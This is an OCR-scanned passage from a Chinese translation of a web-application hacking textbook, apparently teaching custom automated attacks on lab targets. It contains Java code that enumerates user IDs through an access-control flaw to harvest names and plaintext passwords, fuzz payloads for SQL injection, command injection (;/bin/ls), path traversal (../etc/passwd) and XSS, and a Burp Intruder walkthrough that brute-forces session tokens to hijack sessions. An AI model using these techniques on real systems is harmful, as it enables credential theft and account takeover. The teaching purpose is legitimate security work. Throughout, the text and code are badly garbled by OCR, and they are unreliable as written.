试 员 可 以 使 用 自动 化 技巧 获取 数据 。 

口 一 个 网 上 零售 应 用 程序 允许 注册 用 户 查 看 他 们 的 待 办 订单 。 但 
是 ， 如 果 能 够 确定 其 他 用 户 的 订单 号 ， 束 可 以 但 看 他 们 的 订单 信息 ， 就 
像 查 看 自己 的 订单 一 样 。 

o 态 记 密码 功能 的 实施 取决 于 用 户 配 置 的 质询 。 可 以 提交 任意 用 户 
名 并 查看 相关 质询 。 通 过 遍历 一 组 枚 举 或 猪 测 出 来 的 用 户 名 ， 就 能 够 获 
得 大 量 用 户 密码 质询 ， 从 而 确定 那些 最 容易 猜测 的 质询 。 

口 一 个 工作 流程 应 用 程序 包含 一 项 功能 ， 可 显示 某 一 用 户 的 基本 账 
户 信息 ， 包 括 他 在 应 用 程序 中 的 权限 。 通 过 过 历 应 用 程序 使 用 的 用 户 
ID， 渗 透 测 试 员 就 能 够 列 出 所 有 的 管理 用 户 ， 并 以 此 为 基础 进行 密码 猜 
测 和 其 他 攻击 。 

使 用 自动 化 技巧 获取 数据 的 基本 步骤 与 枚 举 有 效 标 识 符 的 步骤 基本 
类 似 ， 其 不 同 之 处 在 于 ， 现 在 不 仅 对 一 个 二 进 制 结果 (“ 触 点 ”或 “ 错 
失 ”) 感 兴趣 ， 还 要 设法 从 每 个 啊 应 中 提取 有 用 的 内 容 。 以 下 面 的 请 求 
为 例 ， 它 由 登录 用 户 提 出 ， 以 显示 其 账户 信息 。 

GET /auth/498/YourDetails.ashx?uid=198 HTTP/1.1 
Host: mdsec.net 
Cookie: SessionId=0947F6DC9A66D29F15362D031B337797 


虽然 具有 通过 验证 的 用 户 能够 访问 此 应 用 程序 功能 ， 但 由 于 存在 访 
问 控 制 漏洞 ， 任 何 用 户 只 需 简单 修改 uid 参 数 ， 即 可 查看 其 他 所 有 用 户 
的 详细 资料 。 在 另 一 个 漏洞 中 ， 披 露 的 详细 资料 还 包括 用 户 的 完整 证 
书 。 由 于 用 户 的 uid 参 数值 相对 较 小 ， 因 此 ， 攻 击 者 能 够 轻易 推测 出 其 
他 用 户 的 标识 符 。 

当 应 用 程序 显示 一 个 用 户 的 资料 时 ， 页 面 源 代码 会 将 个 人 信息 包含 
在 下 面 的 HTML 表 中 : 














< 七 工 > 

<td>Name: </td><td>Phill Bellend</td> 
</tr> 
<tr> 

<td>Username: </td><td>phillb</td> 
</tr> 
<tr> 

<td>Password: </td><td>b3ll3nd</td> 
< /Er 








根据 应 用 程序 的 行为 ， 攻 击 者 可 直接 实施 定制 自动 攻击 ， 获 取 所 有 
应 用 程序 用 户 的 个 人 信息 ， 包 括 证 书 等 。 

为 实施 攻击 测试 ， 我 们 快速 对 JAttack 工 具 进 行 一 些 改进 ， 使 它 能 够 
提取 并 记录 服务 器 啊 应 中 的 特殊 数据 。 首 先 ， 将 攻击 配置 数据 添加 到 源 
代码 的 字符 串 列表 内 ， 通 过 它们 确定 想 要 提取 的 有 用 内 容 : 


static final String[] extractStrings = new String[] 


{ 


} . 


“<td>Name: </td><td>", 
“<td>Username: </td><td>", 
“<td>Password: </td><td>" 


r 


然后 把 下 面 的 代码 添加 到 parseResponse 方 法 中 ， 以 在 每 个 响应 中 搜 
索 上 述 列表 中 的 每 一 个 字符 串 ， 并 提取 字符 串 后 到 圆 括 号 位 置 的 内 容 : 


for (String extract : extractStrings) 


{ 


} 





int from = response.indexOf (extract); 
if (from == -1) 

continue; 
from += extract.length(); 


int to = response.indexOf("<", from}; 
if (to <= =) 

to = response.length{); 
output.append(response.subSequence(from, to) + "\t"); 


这 就 是 对 这 个 工具 的 代码 进行 的 全 部 修改 。 为 配置 JAttack 针 对 我 们 


感 兴趣 的 实际 请 求 ， 需 要 对 它 的 攻击 配置 进行 如 下 更 新 : 
String url = "/auth/498/YourDetails.ashx"; 
Param[] params = new Faram[] 
{ 
new Param("Sessionid", "0947F6DC9A66D29F15362D031B337797", 
Param.Type.COOKIE, false), 
new Param("uid", "198", Param.Type.URL, true}, 
Vi 
PayloadSource payloads = new PSNumbers({190, 200, 1); 


这 个 配置 指示 JAttack 向 相关 UREL 提 出 包含 2 个 必要 参数 的 请 求 : 包 
含 当 前 会 话 令 牌 的 cookie 和 易 受 攻击 的 用 户 标识 符 。 其 中 只 有 一 个 参数 
会 通过 我 们 指定 的 uid 号 范围 进行 修改 。 

现在 再 运行 JAttack， 得 到 以 下 结果 : 








uid 190 500 300 

uid 191 200 27489 Adam Matthews sixpack p4alight 
uid 192 209 28991 Pablina S pablo puntitadth 
uid 193 200 29430 Shawn fattysh gor3qgslu7 
uid 194 500 300 

vid 195 200 28224 Ruth House ruth_h lonelypu55 
uid 196 509 390 

uid 197 200 28171 Chardonnay Vegasc Gangermouse 
uid 198 209 27880 Phill Bellend phillb b3l1l3nd 
uid 199 200 28901 Paul Byrne byrnsey 133tfuzz 
uid 200 200 27388 Peter Weiner weiner skinthird 





可 见 ， 这 次 攻击 成 功 截取 了 一 些 顾客 的 个 人 资料 。 通 过 扩大 攻击 的 
数值 范围 ， 我 们 可 以 提取 应 用 程序 所 有 用 户 的 登录 信息 ， 很 有 可 能 还 包 


A key a 
含 管 理 员 。 
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注意 ， 如 果 对 此 实验 室 示例 运行 JAttack 代 码 ， 则 需要 根据 应 用 
程序 发 布 的 值 调整 攻击 配置 中 使 用 的 URL、 会 话 cookie 和 用 户 ID 参 
¥ 


O 





YY ”提示 以 制 表 符 分 隔 格式 输出 的 数据 可 轻易 加 载 到 Excel 之 
类 的 电子 表格 软件 中 ， 以 对 其 进行 进一步 处 理 或 整理 。 许 多 时 候 ， 
通过 以 上 方法 获取 的 数据 可 用 作 其 他 目 动 攻击 的 输入 。 





定制 目 动 化 技巧 的 第 三 个 主要 用 途 并 不 包含 利用 任何 已 知 的 漏洞 枚 
举 或 提取 信息 ， 而 是 使 用 各 种 由 在 造成 有 反常 行为 的 、 专 门 设 计 的 攻击 字 
人 符 串 来 探查 应 用 程序 中 是 舍 存 在 任何 常见 的 漏洞 。 因 为 以 下 原因 ， 与 前 
面 描述 的 攻击 相 比 ， 这 种 类 型 的 攻击 更 加 缺乏 针对 性 。 

口 无 论 每 个 参数 的 正常 功能 是 什么 ， 或 者 应 用 程序 希望 收 到 何 种 类 
型 的 数据 ， 在 这 种 攻击 中 ， 往 往 需 要 提交 与 测试 应 用 程序 每 个 页 面 的 每 
一 个 参数 相同 的 攻击 有 效 载荷 。 这 些 有 效 载荷 有 时 叫 作 模糊 测试 字符 串 
(fuzz string) 。 

口 事 先 并 不 知道 如 何 确定 “ 触 点 ”。 与 其 监控 应 用 程序 的 响应 ， 在 其 
中 碍 找 特殊 的 指标 ， 还 不 如 系统 性 地 截取 尽 可 能 多 的 数据 并 对 其 进行 审 
En 
HAE. 

ZRAK PA SLA Web by HFEF YK, — ES ag Ye] SE RE Be 
的 应 用 程序 行为 表现 出 来 ， 这 些 行为 包括 特定 的 错误 消息 或 HTTP 状 态 
码 。 有 时 可 以 根据 这 些 漏 洞 签名 来 探查 常见 的 漏洞 ; 而且 ， 目 动 化 应 用 
程序 漏洞 扫描 器 也 使 用 这 种 方法 来 确定 绝 大 多 数 的 漏洞 (请 参阅 第 20 半 
了 解 相 关内 容 ) 。 然 而 ， 从 理论 上 讲 ， 向 应 用 程序 提交 的 任何 测试 字符 
串 都 会 产生 茶 种 可 以 预料 的 行为 ， 在 特定 的 条 件 下 ， 表 明 应 用 程序 存在 
东 种 漏洞 。 为 此 ， 经 验 丰 富 的 攻击 者 使 用 定制 自动 化 技巧 ， 就 比 单单 使 
用 全 目 动 化 工具 更 有 效率 。 这 类 攻击 者 会 对 应 用 程序 啊 应 中 的 每 一 个 相 
天 细节 进行 全 面 分 析 ， 他 能 够 从 应 用 程序 设计 者 与 开发 者 的 角度 考虑 问 
题 。 此 外 ， 他 能 够 发 现 并 调查 请 求 与 啊 应 之 间 不 寻 和 的 联系 ， 而 当前 还 
没有 任何 工具 能 够 做 到 这 一 点。 

功能 复杂 的 大 型 应 用 程序 中 包含 大 量 动态 页 面 ， 且 每 个 页 面 都 能 接 
受 各 种 参数 ， 这 时 ， 使 用 目 动 化 技巧 查找 漏洞 就 非常 有 用 。 手 动 测 试 每 
一 个 参数 ， 并 奶 踊 应 用 程序 对 相关 请 求 啊 应 中 的 有 关 细 市 ， 是 一 个 几乎 
无 法 完成 的 任务 。 使 用 自动 化 工具 代 蔡 完成 需要 手动 执行 的 任务 ， 是 在 
这 种 应 用 程序 中 探查 漏洞 的 唯一 实用 的 方法 。 

确定 上 一 个 示例 中 的 访问 控制 不 完善 并 对 其 加 以 利用 后 ， 我 们 还 可 
以 实施 模糊 测试 攻击 来 检查 各 种 基于 输入 的 漏洞 。 作 为 对 受 攻 击 面 的 初 
步 测 试 ， 我 们 决定 在 每 个 参数 中 轮流 提交 以 下 字符 串 。 

口 '， 如 果 存 在 SQL 注 入 漏洞 ， 某 些 情况 下 ， 提 交 这 个 字符 串 将 造成 






























































一 个 错误 。 
D ;binlls， 如 果 存 在 命令 注入 漏洞 ， 提 交 这 个 字符 串 可 能 导致 无 法 
预料 的 行为 。 
口 ../../../../..etc/passwd， 如 果 存 在 路 径 遍 历 漏 洞 ， 提 交 这 个 字符 串 可 
生成 一 个 不 同 的 响应 。 
口 xsstest， 如 果 这 个 字符 串 被 复制 到 服务 器 的 啊 应 中 ， 那 么 应 用 程 
序 就 容易 受到 跨 站 点 脚本 攻击 。 

我 们 将 对 JAttack 工 具 进 行 扩展 ， 通 过 创建 一 个 新 的 有 效 载荷 源 ， 生 
成 这 些 有 效 载荷 ， 如 下 所 示 : 


class PSFuzzStrings implements PaylcadSource 


a> 








static final String[] fuzzStrings = new String[] 
ve” “Sfbinfls!; “orfres aJete/passwa", “xsetest* 
}; 
int current = -1; 
public boolean nextPayload{) 
current++; 


return current < fuzzStrings.length; 


} 
public void reset () 


current = -1; 


} 
public String getPayload{) 


return fuzzStrings [current]; 


= 

SA 

=> fE 任何 探查 应 用 程序 安全 漏洞 的 重要 攻击 都 需要 使 用 
许多 其 他 攻击 字符 串 ， 以 确定 其 他 薄弱 环 市 和 前 面 提 到 的 漏洞 的 其 
他 变化 形式 。 我 们 将 在 第 21 章 提供 一 个 更 加 全 面 的 列表 ， 列 出 在 对 
Web 应 用 程序 进行 模糊 调试 时 需要 的 所 有 字符 串 。 








为 使 用 JAttack 进 行 模糊 测试 ， 还 需要 扩展 它 的 啊 应 分 析 代 码 ， 使 其 
能 够 提供 更 多 与 应 用 程序 啊 应 有 关 的 信息 。 显 音 提 高 这 种 分 析 能 力 的 一 
个 简单 办 法 ， 惑 是 在 每 个 啊 应 中 搜索 指示 出 现 东 种 反 弟 行为 的 利 见 字符 
串 和 错误 消息 ， 并 记录 和 它们 在 工具 的 输出 结果 中 出 现 的 每 一 种 情况 。 
首 匈 ， 在 攻击 配置 数据 中 添加 想 要 搜索 的 字符 串 列 表 : 


static nal String[] grepStrings = new Stringi] 











{ 
"exception", "illegal", "quotation", "not found", “xsstest” 





然后 插入 下 面 的 parseResponse 方 法 ， 以 在 啊 应 中 搜索 前 面 提 到 的 每 
一 个 字符 串 ， 并 记录 任何 发 现 的 字符 串 : 
for (String grep : grepStrings) 
if (response.indexOf(grep) != -1) 


output.append(grep + "\t"); 


W 提示 事实 证 明 ， 枚 举 应 用 程序 中 的 标识 符 时 ， 在 JAttack 
中 合并 这 种 搜索 功能 往往 非常 有 用 。 通 常 ， 在 应 用 程序 的 响应 中 是 
否 存 在 某 个 特殊 的 表达 式 是 出 现 “ 触 点 "的 最 可 靠 指 标 。 

我 们 可 以 利用 这 些 代码 建立 一 个 基本 的 Web 应 用 程序 漏洞 测试 器 。 


当 实 施 具 体 的 攻击 时 ， 测 试 员 只 需 用 相关 的 请 求 细 市 对 JAttack 进 行 配 
置 ， 指 示 它 攻击 每 一 个 参数 。 代 码 如 下 所 示 : 


String host = "mdsec.net"; 











int port = 80; 
string method = "GET"; 
String url = */auth/498/YourDetails.ashx"; 
Param[] params = new Parami] 
{ 
new Param{"SessionId", "CiFSAFDD/DF969BDICD2CE40A2E07D19", 
Param.Type.COOKIE, true), 


new Param("uid", "198", Param.Type.URL, true), 


PayloacSource payloads = new PSFuzzStrings(); 


配置 这 些 细 市 后 就 可 以 开始 实施 攻击 。 在 儿 秒 钟 内 ，JAttack 就 已 经 
器 所 有 请 求 参 数 提交 了 攻击 有 效 载 往 。 而 手动 提交 至 少 圾 要 几 分 钟 时 











间 ， 审 查 并 分 析 应 用 程序 收 到 的 啊 应 则 需要 更 长 时 间 。 
接 下 来 再 对 JAttack 的 输入 结果 进行 手动 检查 ， 尝 试 确定 任何 表示 漏 
洞 存在 分 析 下 面 这 段 输出 摘录 : 





g length 


Ja 
8 I 502 
Sess Id bin/ls ) 502 
Sess iIG fast sswd { 502 
Se I stes 302 02 
ul 0 1941 t 
ul 1 { 289: x 
uid fC Dw 200 2915 exception 
200 2898 exception xsstes 


en 于 应 用 程序 返回 一 个 始终 为 相 HKE 
的 重 定 同 啊 应 。 这 种 行为 并 不 表示 存在 任何 漏洞。 这 并 不 奇怪 ， 因 为 在 
登录 时 修改 会 话 令 牌 通常 会 使 当前 会 话 失 效 ， 用 户 将 被 重 定 癌 到 登录 页 
面 


uid 参 数 更 有 意思 。 对 这 个 参数 的 任何 修改 都 会 导致 一 个 包含 字符 
串 exception 的 响应 。 表明 不 同 的 有 效 载荷 会 导致 
不 同 的 啊 应 ， 因 此 这 些 啊 应 可 能 并 不 是 滑 规 的 错误 消息 。 而 且 ， 可 以 看 
到 ， 提 交 单 引号 时 ， 应 用 程序 的 啊 应 包含 字符 串 quotation， 这 可 能 是 
SQL 错 误 消 息 的 一 部 分 ， 说 明 应 用 程序 可 能 存在 SQL 注 入 漏洞 ， 我 们 应 
进行 手动 测试 来 确认 这 一 点 《请 参阅 第 9 章 ) 。 此 外 ， 我 们 还 发 现 ， 应 
用 程序 的 啊 应 回 显 了 有 效 载 集 xsstest。 因 此 应 进一步 探查 这 种 行为 ， 以 
ee ee 〈 请 参阅 第 12 章 文 解 
目 关 内 容 ) 。 
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145 ”整合 全 部 功能 : Burp Intruder 


JAttack 由 不 到 250 行 的 简单 代码 构成 ， 然 而 ， 当 对 一 个 向 应 用 程序 

A 它 在 几 秒 钟 内 就 能 发 现 至 少 两 个 严重 的 安 
漏洞 。 

尽管 它 的 功能 强大 ， 但 是 ， 只 要 开始 使 用 JAttack 这 样 的 工具 实施 目 
动 化 定制 攻击 ， 渗 透 测 试 员 束 立即 可 以 发 现 其 他 更 有 用 的 功能 。 按 现在 
的 情况 ， 需 要 在 工具 的 源 代 码 中 配置 每 一 个 目标 请 求 ， 然 后 重新 编译 
它 。 但 最 好 是 从 一 个 配置 文件 中 读 取 这 些 信 息 ， 然 后 在 运行 时 动态 构建 
攻击 。 实 际 上 ， 最 好 的 办 法 是 建立 一 个 友好 的 用 户 界面 ， 可 通过 它 在 几 
秒 钟 内 配置 上 述 攻 击 。 

许多 时 候 ， 渗 透 测试 员 还 需要 以 更 加 有 灵活 的 方式 生成 有 效 载荷 ， 并 
使 用 比 我 们 创建 的 有 效 载 答 源 更 高 级 的 源 。 而 且 ， 通 常 还 需要 支持 
SSL、HTTP 验 证 、 多 线程 请 求 、 上 自动 跟随 重 定 同 ， 并 对 有 效 载 答 内 的 
不 和 常见 字符 进行 目 动 编码 。 有 时 ， 一 次 只 修改 一 个 参数 可 能 觉得 限制 过 
大 ; 攻击 者 可 能 希望 同时 在 两 个 参数 中 注入 不 同 的 有 效 载 集 来 源 。 为 便 
于 参考 ， 最 好 是 保存 应 用 程序 的 全 部 啊 应 ， 这 样 就 可 以 立即 检查 一 个 有 
用 的 啊 应 ， 了 解 发 生 了 什么 状况 ， 甚 至 手动 调整 对 应 的 请 求 并 重新 提出 
这 个 请 求 。 除 了 不 断 修改 和 提出 同一 个 请 求 ， 有 时 需要 人 处理 多 阶段 进 
程 、 应 用 程序 会 话 和 预 请 求 令 牌 。 同 样 ， 最 好 是 将 这 个 工具 与 其 他 有 用 
的 工具 《如 代理 服务 器 与 爬虫 ) 整合 起 来 ， 避 免 来 回 剪 切 和 粘贴 信息 。 

Burp Intruder 是 唯一 能 够 执行 所 有 这 些 功能 的 工具 。 它 专门 为 通过 
最 少 的 配置 实施 各 种 自动 化 定制 攻击 而 设计 ， 并 且 在 输出 结果 中 提供 大 
量 细 节 ， 帮 助 迅 速 确 定 “ 触 点 ?和 其 他 反常 现象 。 它 还 可 与 其 他 Burp Suite 
工具 完全 整合 。 例 如 ， 可 以 在 代理 服务 器 中 拦截 一 个 请 求 ， 将 它 提交 给 
Intruder 进 行 模糊 测试 ， 并 在 几 秒 钟 内 确定 前 面 示 例 中 描述 的 各 种 漏 
洞 。 

下 面 摘 述 Burp Intruder 的 基本 功能 与 配置 ， 然 后 分 析 使 用 它 执 行 自 
动 化 定制 攻击 的 一 些 示例 。 

1. ZEA MMi 

Burp Intruder 使 用 一 个 类 似 于 JAttack 的 概念 型 模型 ， 在 请 求 的 特定 
位 置 安置 有 效 载 从 ， 并 使 用 一 个 或 几 个 有 效 载 答 来 源 。 然 而 ， 它 的 功能 
并 不 仪 限 于 将 有 效 载 奏 字符 串 插入 到 请 求 参数 值 中 ;有 效 载 衔 可 安置 在 
参数 值 的 某 个 局 部 位 置 或 参数 名 中 ， 也 可 以 安装 在 请 求 消 息 头 或 主体 的 



































任何 位 置 。 


确定 以 某 个 特殊 请 求 作 为 攻击 对 象 后 ，Burp Intruder 使 用 一 组 标记 





定义 每 个 有 效 载荷 位 置 ， 指 明 插 入 有 效 载 向 的 起 始点 与 结束 点 ， 如 图 


14-1 所 示 。 
burp suite professicnal ie bok) fees 
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图 14-1 ZEA 





在 茶 个 位 置 插入 有 效 载荷 时 ， 标 记 之 间 的 任何 文本 将 被 有 效 载 位 重 








写 。 如 果 没 有 插入 有 效 载 合 ， 束 提交 标记 间 的 文本 。 为 便于 一 次 测试 一 
个 参数 ， 同 时 将 其 他 参数 保持 原样 ， 这 样 做 是 必要 的 。 这 一 做 法 与 对 应 
用 程序 进行 模糊 测试 时 完全 相同 。 单 击 auto 按 钮 将 指示 Intruder 在 所 有 
URL、cookie 和 主体 参数 值 中 设 定 有 效 载 奏 位 置 ， 从 而 将 在 JAttack 中 需 


要 手动 操作 的 任务 自动 化 。 





sniper 攻 击 类 型 是 最 第 见 的 一 种 攻击 类 型 ， 它 的 作用 与 JAttack 的 请 
求 引擎 相同 : 一 次 针对 一 个 有 效 载荷 位 置 ， 在 那个 位 置 提 交 所 有 有 效 载 
位， 然后 转 回 下 一 个 位 置 。 其 他 攻击 类 型 允许 使 用 几 个 有 效 载 入 ， 以 不 





同 的 方式 一 次 针对 几 个 位 置 进行 攻击 。 
2. 选择 有 效 载 葆 


准备 攻击 的 下 一 个 步 


又 是 选择 将 要 在 指定 位 置 插 入 的 有 效 载 谷 。 


Intruder 包 含 大 量 用 于 生成 攻击 有 效 载 集 的 内 置 功能 。 





口 预先 设置 与 可 配置 的 数据 列表 。 

口 根据 任何 语法 模式 对 有 效 载荷 进行 定制 只 代 。 人 例如， 如果 应 用 程 
e a IBA Hy LEH E TA as E PPA AT fe 
JHE. 

口 字 符 与 大 小 写 蔡 换 。 根 据 最 初 的 有 效 载 傈 列表 ，Intruder 可 修改 单 
个 的 字符 及 其 大 小 写 ， 以 生成 它们 的 变化 形式 。 这 项 功能 在 对 密码 实施 
蛋 力 攻击 时 非常 有 有 用， 例如， 字符 串 password 可 修改 为 p4ssword、 
passw0rd、Password、PASSWORD 等 。 

口 数 字 可 用 于 过 历 文档 ID、 会 话 令 牌 等 。 数 字 可 为 十 进 制 或 十 六 进 
制 、 整 数 或 分 数 、 投 顺序 排列 、 逐 步 递 增 或 完全 随机 。 当 知道 一 些 有 效 
值 的 大 小 ， 但 无 法 确定 推断 这 些 值 的 任何 可 靠 模 式 时 ， 在 一 个 指定 的 范 
内 生成 随机 数字 可 用 于 搜索 “ 触 点 ”。 

口 某 些 情况 下 ， 日 期 和 数字 有 痢 相 同 的 用 途 。 例 如 ， 如 果 登 录 表 单 
要 求 输入 出 生日 期 ， 那 么 就 可 以 使 用 这 项 功能 对 指定 范围 内 的 所 有 有 效 
值 实施 蛮 力 攻击 。 

口 可 使 用 非法 Unicode 编 码 ， 通 过 提交 恶意 字符 的 编码 形式 避 开 一 
些 输入 过 滤 。 
口 字 符 块 可 用 于 探查 绥 冲 区 溢出 漏洞 〈 请 参阅 第 16 章 了 解 相 关内 


口 查 力 功 能 可 用 于 生成 一 个 特殊 字符 集 在 指定 长 度 范 围 内 的 所 有 排 
列 组 合 。 许 多 时 候 ， 由 于 它 能 生成 大 量 的 请 求 ， 使 用 这 种 功能 是 我 们 能 
够 依赖 的 最 后 一 个 办 法 。 例 如 ， 对 仪 包含 小 写字 母 字 符 的 6 位 数 密码 进 
行 杰 力 攻击 ， 将 生成 300 多 万 个 排列 组 合 ; 仪 通过 远程 访问 应 用 程序 几 
乎 不 可 能 提交 如 此 数目 庞大 的 请 求 。 

口 “字符 打 乱 ”和 “位 翻转 2 功能， 可 用 于 系统 化 地 操纵 参数 的 现 有 值 
的 各 个 部 分 ， 以 探查 应 用 程序 如 何 处 理 各 种 难以 察觉 的 修改 (请 参阅 第 
T iy 

RAAR ERRES Aa DAAC E, EEH A R E 
之 前 对 每 个 值 进行 任意 处 理 。 这 包括 字符 串 和 大 小 写 修改 、 各 种 编 解 码 
以 及 散 列 操作 。 这 样 做 有 助 于 在 各 种 非常 规 情况 下 构建 有 用 的 有 效 
AX ABT o 

默认 情况 下 ， 在 请 求 中 插入 字面 量 字 符 会 使 请 求 失效 ，Burp 
Intruder 会 对 这 些 字符 进行 URL 编 码 。 

3. 配置 啊 应 分 析 

在 实施 攻击 前 ， 渗 透 测 试 员 应 当 确 定 想 要 分 析 的 服务 器 响应 属性 。 
例如 ， 当 枚 举 标识 符 时 ， 可 能 需要 在 每 个 啊 应 中 搜索 一 个 特殊 的 字符 
串 ， 在 模糊 测试 时 ， 攻 击 者 也 许 希 望 扫 插 大量 常 见 的 错误 消息 等 。 




















容 ) 











默认 情况 下 ，Intruder 会 在 它 的 结果 表 中 记录 HTTP 状 态 码 、 啊 应 长 
度 、 服 务 嚣 设 定 的 任何 cookie 以 及 收 到 啊 应 的 时 间 。 和 JAttack 一 样 ， 还 
可 以 配置 Burp Intruder 对 应 用 程序 的 啊 应 进行 其 他 一 些 自 定义 分 析 ， 以 
帮助 确定 表明 存在 漏洞 或 值得 深入 调查 的 数据 。 可 以 指定 在 啊 应 中 搜索 
的 字符 串 或 正则 表达 式 ; 可 以 设 定 上 自 定义 字符 串 ， 控 制 从 服务 器 的 啊 应 
中 提取 数据 ， 还 可 以 指示 Intruder 检 查 每 个 啊 应 是 否 包 含 攻 击 字 符 串 本 
身 ， 以 帮助 确定 跨 站 点 脚本 和 其 他 啊 应 注入 漏洞 。 

确定 有 效 载 集 位 置 、 有 效 载 往来 源 以 及 需要 对 服务 右 啊 应 进行 哪些 
分 析 后 ， 渗 透 测 试 员 就 可 以 实施 攻击 。 下 面 简要 说 明 如 何 使 用 Intruder 
实施 一 些 和 常见 的 自动 化 定制 攻击 。 

4. 攻击 1: 枚 举 标识 符 

假设 正 以 一 个 支持 匿名 用 户 自 我 注册 的 应 用 程序 为 攻击 目标 。 创 建 

个 账户 ， 登 录 应 用 程序 ， 访 问 最 少量 的 功能 。 在 这 个 阶段 ， 应 用 程序 
m2 会 话 令 牌 是 一 个 明显 的 攻击 对 象 。 连 续 进 行 几 次 登录 ， 会 得 到 以 下 令 














000000-f£b2200-16cb12-172ba72551 
000000-bc7192-16cb12-172ba7279e 
000000-73091f£-16cb12-172ba729e8 
000000-918cb1-16cb12-172ba72a2a 
000000-aa820f-16cb12-172ba72b58 
000000-bc8710-16cb12-172ba72e2b 


按照 第 7 重 摘 述 的 步骤 分 析 这 些 令 牌 后 会 发 现 : 很 明显 ， 令 牌 中 几 
乎 有 一 半 的 内 容 没 有 发 生变 化 ; 但是， 令 牌 的 第 二 部 分 实际 上 并 未 被 应 
用 程序 处 理 。 完 全 修改 这 个 部 分 并 不 会 使 令 牌 失效 。 而 且 ， 虽 然 这 些 令 
牌 并 不 严格 按 顺 序 排列 ， 但 最 后 一 部 分 明显 以 某 种 方式 同上 递增 。 根据 
这 些 信息 ， 渗 通 测 试 员 也 许 能 够 对 应 用 程序 实 记 在 会 话 支持 攻击 。 

要 利用 自动 技巧 实施 这 个 攻击 ， 需 要 找到 一 个 可 用 于 探 得 有 效 令 牌 
的 请 求 / 啊 应 对 。 通 第， 任何 访问 应 用 程序 通过 验证 的 页 面 的 请 求 都 可 
用 于 这 种 目的 。 假 设 以 每 名 用 户 登 录 后 显示 的 主页 为 攻击 对 象 : 

GET /auth/502/Home.ashx HTTP/1.1 

Host: mdsec.net 

Cookie: SessionID=000000-£b2200-16cb12-172ba72551 
由 于 已 经 知道 会 话 令 牌 的 结构 及 应 用 程序 如 何 处 理 令 牌 ， 因 此 ， 只 
令 牌 的 最 后 一 个 部 分 就 可 实施 攻击 。 实 际 上 ， 根 据 前 面 确 定 的 令 牌 序 














列 ， 最 有 效 的 初步 攻击 只 需 修改 令 牌 最 后 的 几 位 数字 。 因 此 ， 用 
Intruder 配 置 唯一 一 个 有 效 载荷 位 置 ， 如 图 14-2 所 示 。 
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GET /auth/S502/Home.ashx ETTP/ 1.1 

Accept: text/heml, applicaticn/xhtmlexml, */* 

Referer: hetps://mdsec.net/auth/S05/ 

Accept-Language: en-GE 

User-Agent: Horilla/S.0 (compatible; MSIE 9.0; Vindows NT 6.1: WOWE4: 
Tr idenet/5.0) 

Cookie: Sess.onld=000000-FS4f4r-ifchis-ID¢C7AOCRIBSE 

Accept-Encod-ng: gzip, deflate 


Kost: miscc.nct 
Connection: Eeep-alive 
Cache-Contro:; no-cache 











图 14-2” 设 定 一 个 定制 的 有 效 载荷 位 置 


有 效 载荷 需要 遍历 最 后 三 位 的 所 有 可 能 值 。 令 牌 使 用 的 可 能 是 十 六 
进 制 字符 集 : 0~9 与 a~f。 因 此 ， 配 置 一 个 有 效 载荷 来 源 生 成 0x000~0xfff 
之 间 的 所 有 十 六 进 制 数字 ， 如 图 14-3 所 示 。 
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图 14-3 ACR Se tir 








在 枚 举 有 效 会 话 令 牌 的 攻击 中 ， 通 常 可 以 直接 确定 “ 触 点 ”。 在 当前 
的 示例 中 已 经 确定 : 如 果 提 交 一 个 有 效 的 令 牌 ， 应 用 程序 会 返回 一 个 
HTTP 20014; 否则 就 返回 一 个 退回 登录 页 面 的 HTTP 302 重 定 问 。 
此 ， 测 试 员 不 必 为 攻击 配置 任何 定制 的 响应 分 析 。 

实施 攻击 后 ，Imtruder 将 迅速 循环 提出 所 有 请 求 。 攻 击 结果 在 一 个 
表格 中 显示 ， 可 以 单 击 表 的 列 标题 ， 根 据 该 列 的 内 容 对 结果 进行 分 类 。 
按 状态 码 分 类 可 帮助 轻松 确定 已 经 发 现 的 有 效 令 牌 ， 如 图 14-4 所 示 。 
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图 14-4 ”分 类 攻击 结果 以 迅速 确定 “ 触 点 ” 





攻击 取得 成 功 。 现 在 渗透 测试 员 可 以 选择 任何 返回 HTTP 200 啊 应 
MIA ae Air , Alene bas 话 令 牌 最 后 的 三 个 数字 ， 从 而 劫持 
其 他 应 用 程序 用 户 的 会 话 。 然 而 ， 对 结果 表 进 行 仔细 分 析 后 会 发 现 : 由 
因而 大 多 数 HTTP 
200 啊 应 的 长 度 也 大 至 相同 。 然 而， 其 中 有 两 个 啊 应 要 更 长 一 些 ， 表 示 
ec 

可 以 在 Intruder 中 双击 其 中 一 个 结果 ， 以 HTTP 源 代码 或 HTML 格 式 
完整 显示 服务 器 的 啊 应 。 之 后 会 发 现 ， 与 主页 相 比 ， 较 长 的 主页 中 包含 
大 量 沫 单 选项 。 据 此 推测 ， 这 两 个 劫持 的 会 话 似 乎 属于 更 高 权限 的 用 
JEg 














A IF 


http://mdsec.net/auth/502/ 


Vo 提示 事实 证 明 ， 虽 应 长 度 往往 是 一 个 明显 的 指标 ， 指 出 
值得 进一步 调查 的 反常 响应 。 在 上 面 的 示例 中 ， 一 个 长 度 不 同 的 啊 
应 会 让 测试 员 发 现在 设计 攻击 时 未 曾 预 料 到 的 管理 员 会 话 令 牌 。 因 
此 ， 即 使 其 他 属性 提供 了 一 个 可 靠 的 * 触 点 ?指标 “如 HITP 状 态 
码 ) ， 还 是 应 始终 检查 啊 应 长 度 列 ， 以 确定 其 他 有 用 的 啊 应 。 


5. 攻击 2: 获取 信息 

进一步 浏览 到 应 用 程序 的 已 通过 验证 的 区 域 ， 我 们 注意 到 应 用 程序 
在 URL 参 数 中 使 用 索引 号 来 标识 用 户 请 求 的 功能 。 例 如 ， 以 下 URL 用 于 
显示 当前 用 户 的 “用 户 资 料 ” 页 面 : 


https: //mdsec.net/auth/502/ShowPage. ashx?pageid=32010039 


这 种 行为 提供 了 一 个 极 好 的 机 会 ， 可 用 于 搜集 之 前 尚未 发 现 及 未 获 
得 正确 授权 的 功能 。 为 此 ， 可 以 使 用 Burp Intruder 遍 历 一 系列 可 能 的 
pageid 值 ， 并 提取 出 所 发 现 的 每 个 页 面 的 标题 。 

在 这 种 情况 下 ， 通 常 较为 明智 的 做 法 ， 是 在 某 个 已 知 包 含有 效 值 的 
数值 范围 内 开始 内 容 搜集 。 为 此 ， 可 以 将 有 效 载荷 位 置 标记 设 置 为 针对 
pageid 的 最 后 两 位 数 ， 如 图 14-5 所 示 ， 并 生成 00 到 99 范 围 内 的 有 效 载 
Tf 








GET /auth/ 50° /ShowPage.ashx?pageid=320100 
Accept: text/html, application/xhemi+cml, */* 
